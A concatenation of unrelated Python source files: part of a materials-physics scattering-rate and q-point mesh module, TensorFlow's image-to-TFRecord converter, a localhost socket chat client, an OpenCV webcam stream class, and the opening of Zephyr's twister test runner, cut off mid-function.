res[i] = np.abs(np.dot(final, initial)) ** 2
return res
@numba.njit
def _get_overlap_ncl(
spin_coeffs, spin_coeffs_mapping, b_idx, k_idx, band_mask, kpoint_mask
):
res = np.zeros(band_mask.shape[0])
initial = np.conj(spin_coeffs[spin_coeffs_mapping[b_idx, k_idx]])
for i in range(band_mask.shape[0]):
final = spin_coeffs[spin_coeffs_mapping[band_mask[i], kpoint_mask[i]]]
sum_ = 0j
for j in range(final.shape[0]):
sum_ += initial[j, 0] * final[j, 0] + initial[j, 1] * final[j, 1]
res[i] = abs(sum_) ** 2
return res
def _interpolate_zero_rates(
rates, kpoints, masks: Optional = None, progress_bar: bool = defaults["print_log"]
):
# loop over all scattering types, doping, temps, and bands and interpolate
# zero scattering rates based on the nearest k-point
logger.info("Interpolating missing scattering rates")
n_rates = sum([np.product(rates[spin].shape[:-1]) for spin in rates])
if progress_bar:
pbar = get_progress_bar(total=n_rates, desc="progress")
else:
pbar = None
t0 = time.perf_counter()
k_idx = np.arange(len(kpoints))
for spin in rates:
for s in range(rates[spin].shape[0]):
# if a rate at a k-point for any doping, or temperature is zero then
# flag it for interpolation
all_non_zero_rates = (rates[spin][s] > 1e6).all(axis=(0, 1))
for d, t, b in np.ndindex(rates[spin].shape[1:-1]):
if masks is not None:
mask = np.invert(masks[spin][s, d, t, b])
else:
mask = [True] * len(rates[spin][s, d, t, b])
non_zero_rates = all_non_zero_rates[b][mask]
zero_rate_idx = k_idx[mask][~non_zero_rates]
non_zero_rate_idx = k_idx[mask][non_zero_rates]
if not np.any(non_zero_rates):
# all scattering rates are zero so cannot interpolate
# generally this means the scattering prefactor is zero. E.g.
# for POP when studying non polar materials
rates[spin][s, d, t, b, mask] += small_val
elif np.sum(non_zero_rates) != np.sum(mask):
# seems to work best when all the kpoints are +ve therefore add 0.5
# Todo: Use cartesian coordinates?
# interpolate log rates to avoid the bias towards large rates
rates[spin][s, d, t, b, zero_rate_idx] = np.exp(
griddata(
points=kpoints[non_zero_rate_idx] + 0.5,
values=np.log(rates[spin][s, d, t, b, non_zero_rate_idx]),
xi=kpoints[zero_rate_idx] + 0.5,
method="nearest",
)
)
# rates[spin][s, d, t, b, zero_rate_idx] = 10 ** (15 + s)
if pbar is not None:
pbar.update()
if pbar is not None:
pbar.close()
log_time_taken(t0)
return rates
def get_fine_mesh_qpoints(
intersections,
basis,
cond_a_mask,
cond_b_mask,
cond_c_mask,
high_tol=0.1,
med_tol=0.2,
cross_section_weights=None,
):
if cross_section_weights is None:
cross_section_weights = np.ones(len(intersections))
# minimum norm in each intersection
all_norms = np.linalg.norm(intersections, axis=-1)
# intersections now has shape nvert, ntet, 2 (i.e., x, y coords)
intersection_idxs = np.arange(len(intersections))
z_coords = intersections[:, 0, 2]
intersections = intersections[:, :, :2].transpose(1, 0, 2)
triangle_mask = cond_a_mask | cond_c_mask
# have to do these separately as the triangle intersections always have [0, 0, 0]
# as the last coordinate
norms = np.ones(len(all_norms))
norms[triangle_mask] = np.min(all_norms[:, :3][triangle_mask], axis=-1)
norms[cond_b_mask] = np.min(all_norms[cond_b_mask], axis=-1)
qpoints = []
qweights = []
mapping = [] # maps a qpoint to an intersection index
def _get_tri_mesh(prec, min_norm, max_norm):
scheme = ni[prec]["triangle"]
mask = (min_norm <= norms) & (norms < max_norm) & triangle_mask
if not np.any(mask):
return
simplex = intersections[:3, mask]
vol = quadpy.tn.get_vol(simplex)
xy_coords = quadpy.tn.transform(scheme.points, simplex.T)
weights = (
scheme.weights[None] * vol[:, None] * cross_section_weights[mask][:, None]
)
qpoints.append(get_q(xy_coords, z_coords[mask]))
qweights.append(weights.reshape(-1))
mapping.append(np.repeat(intersection_idxs[mask], len(scheme.weights)))
def _get_quad_mesh(prec, min_norm, max_norm):
scheme = ni[prec]["quad"]
mask = (min_norm <= norms) & (norms < max_norm) & cond_b_mask
if not np.any(mask):
return
cube = intersections.reshape((2, 2, -1, 2))[:, :, mask]
# 4 is taken from quadpy CnScheme.integrate
# ref_vol = 2 ** numpy.prod(len(ncube.shape) - 1) which for quadrilaterals = 4
vol = 4 * np.abs(quadpy.cn._helpers.get_detJ(scheme.points, cube))
xy_coords = quadpy.cn.transform(scheme.points, cube).T
weights = scheme.weights[None] * vol * cross_section_weights[mask][:, None]
qpoints.append(get_q(xy_coords, z_coords[mask]))
qweights.append(weights.reshape(-1))
mapping.append(np.repeat(intersection_idxs[mask], len(scheme.weights)))
_get_tri_mesh("high", 0, high_tol)
_get_tri_mesh("medium", high_tol, med_tol)
_get_tri_mesh("low", med_tol, np.Inf)
_get_quad_mesh("high", 0, high_tol)
_get_quad_mesh("medium", high_tol, med_tol)
_get_quad_mesh("low", med_tol, np.Inf)
qpoints = np.concatenate(qpoints)
qweights = np.concatenate(qweights)
mapping = np.concatenate(mapping)
return get_kpoints_in_original_basis(qpoints, basis[mapping]), qweights, mapping
def get_kpoints_in_original_basis(q, basis):
# transform k back to original lattice basis in cartesian coords
return np.einsum("ikj,ij->ik", basis, q)
def get_q(x, z_coords):
z = np.repeat(z_coords[:, None], len(x[0][0]), axis=-1)
return np.stack([x[0], x[1], z], axis=-1).reshape(-1, 3)
def _get_fd(energy, fermi_levels, temperatures):
f = np.zeros(fermi_levels.shape)
for n, t in np.ndindex(fermi_levels.shape):
f[n, t] = fd(energy, fermi_levels[n, t], temperatures[t] * boltzmann_au)
return f
|
build_image_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
# 'image/class/label': _int64_feature(label),
# 'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected eror while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
# unique_labels = []
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
client.py
|
import socket
import threading
nickname = input("choose a nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1',55555))
def receive():
while True:
try:
message = client.recv(1024).decode('ascii')
if message == "Nick:":
client.send(nickname.encode('ascii'))
else:
print(message)
except:
print("An error occured!")
client.close()
break
def write():
while True:
message = f'{nickname}:{input("")}'
client.send(message.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
cam.py
|
import datetime
from threading import Thread
import cv2
class FPS:
def __init__(self):
self.start = None
self.end = None
self.numFrames = 0
def start(self):
self.start = datetime.datetime.now()
return self
def stop(self):
self.end = datetime.datetime.now()
def update(self):
self.numFrames += 1
def elapsed(self):
return (self.end - self.start).total_seconds()
def get_fps(self):
return self.numFrames / self.elapsed()
class WebCamVideoStream:
def __init__(self, src=0):
#init opencv stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
#flag to indicate if thread should be stopped
self.stopped = False
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
while True:
if self.stopped:
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
return self.frame
def stop(self):
self.stopped = True
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
